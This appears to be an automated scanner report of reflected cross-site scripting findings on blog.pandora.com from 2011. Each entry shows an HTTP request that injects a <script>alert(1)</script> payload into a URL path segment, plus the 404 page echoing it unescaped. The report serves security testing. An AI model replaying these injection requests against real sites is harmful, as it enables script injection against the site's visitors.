GET /pandoraa724b<script>alert(1)</script>15c03653159/archives/oregon/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraa724b<script>alert(1)</script>15c03653159/archives/oregon/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 39f53<script>alert(1)</script>f58171d63c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives39f53<script>alert(1)</script>f58171d63c4/oregon/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives39f53<script>alert(1)</script>f58171d63c4/oregon/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 88507<script>alert(1)</script>bba21d90949 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/oregon88507<script>alert(1)</script>bba21d90949/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:18 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/oregon88507<script>alert(1)</script>bba21d90949/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e4fb4<script>alert(1)</script>426d5c520e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorae4fb4<script>alert(1)</script>426d5c520e/archives/other-states/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 353
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorae4fb4<script>alert(1)</script>426d5c520e/archives/other-states/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8f143<script>alert(1)</script>15a8d762de1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives8f143<script>alert(1)</script>15a8d762de1/other-states/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives8f143<script>alert(1)</script>15a8d762de1/other-states/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27558<script>alert(1)</script>268c97fcc9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/other-states27558<script>alert(1)</script>268c97fcc9d/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/other-states27558<script>alert(1)</script>268c97fcc9d/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4116e<script>alert(1)</script>e1dd3c30265 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4116e<script>alert(1)</script>e1dd3c30265/archives/other_states/index.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:40 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 364
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora4116e<script>alert(1)</script>e1dd3c30265/archives/other_states/index.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bbc81<script>alert(1)</script>8bbad4a334b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbbc81<script>alert(1)</script>8bbad4a334b/other_states/index.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:42 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 364
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbbc81<script>alert(1)</script>8bbad4a334b/other_states/index.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e3b20<script>alert(1)</script>a06d1810695 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/other_statese3b20<script>alert(1)</script>a06d1810695/index.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:44 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 364
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/other_statese3b20<script>alert(1)</script>a06d1810695/index.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a28a3<script>alert(1)</script>a45d2616222 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/other_states/index.htmla28a3<script>alert(1)</script>a45d2616222 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:47 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 364
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/other_states/index.htmla28a3<script>alert(1)</script>a45d2616222 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2e30d<script>alert(1)</script>9faee399280 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2e30d<script>alert(1)</script>9faee399280/archives/pennsylvania/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2e30d<script>alert(1)</script>9faee399280/archives/pennsylvania/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 37daf<script>alert(1)</script>c2d02fb7876 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives37daf<script>alert(1)</script>c2d02fb7876/pennsylvania/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives37daf<script>alert(1)</script>c2d02fb7876/pennsylvania/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 60d1f<script>alert(1)</script>2be1e057475 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/pennsylvania60d1f<script>alert(1)</script>2be1e057475/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 354 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/pennsylvania60d1f<script>alert(1)</script>2be1e057475/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9a40f<script>alert(1)</script>859bfd370e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9a40f<script>alert(1)</script>859bfd370e9/archives/play-listen-repeat/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 360 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora9a40f<script>alert(1)</script>859bfd370e9/archives/play-listen-repeat/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 604e5<script>alert(1)</script>75e75ebb353 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives604e5<script>alert(1)</script>75e75ebb353/play-listen-repeat/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:18 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 360
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives604e5<script>alert(1)</script>75e75ebb353/play-listen-repeat/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d2f58<script>alert(1)</script>9cecf728f10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/play-listen-repeatd2f58<script>alert(1)</script>9cecf728f10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 360
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/play-listen-repeatd2f58<script>alert(1)</script>9cecf728f10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 410e8<script>alert(1)</script>b6acfa54d50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora410e8<script>alert(1)</script>b6acfa54d50/archives/rhode-island/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora410e8<script>alert(1)</script>b6acfa54d50/archives/rhode-island/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c7510<script>alert(1)</script>e386b3405c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc7510<script>alert(1)</script>e386b3405c7/rhode-island/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesc7510<script>alert(1)</script>e386b3405c7/rhode-island/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 61a2b<script>alert(1)</script>066ab1d13fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/rhode-island61a2b<script>alert(1)</script>066ab1d13fc/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/rhode-island61a2b<script>alert(1)</script>066ab1d13fc/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e5b43<script>alert(1)</script>94fa79588e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorae5b43<script>alert(1)</script>94fa79588e1/archives/roadtrip/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
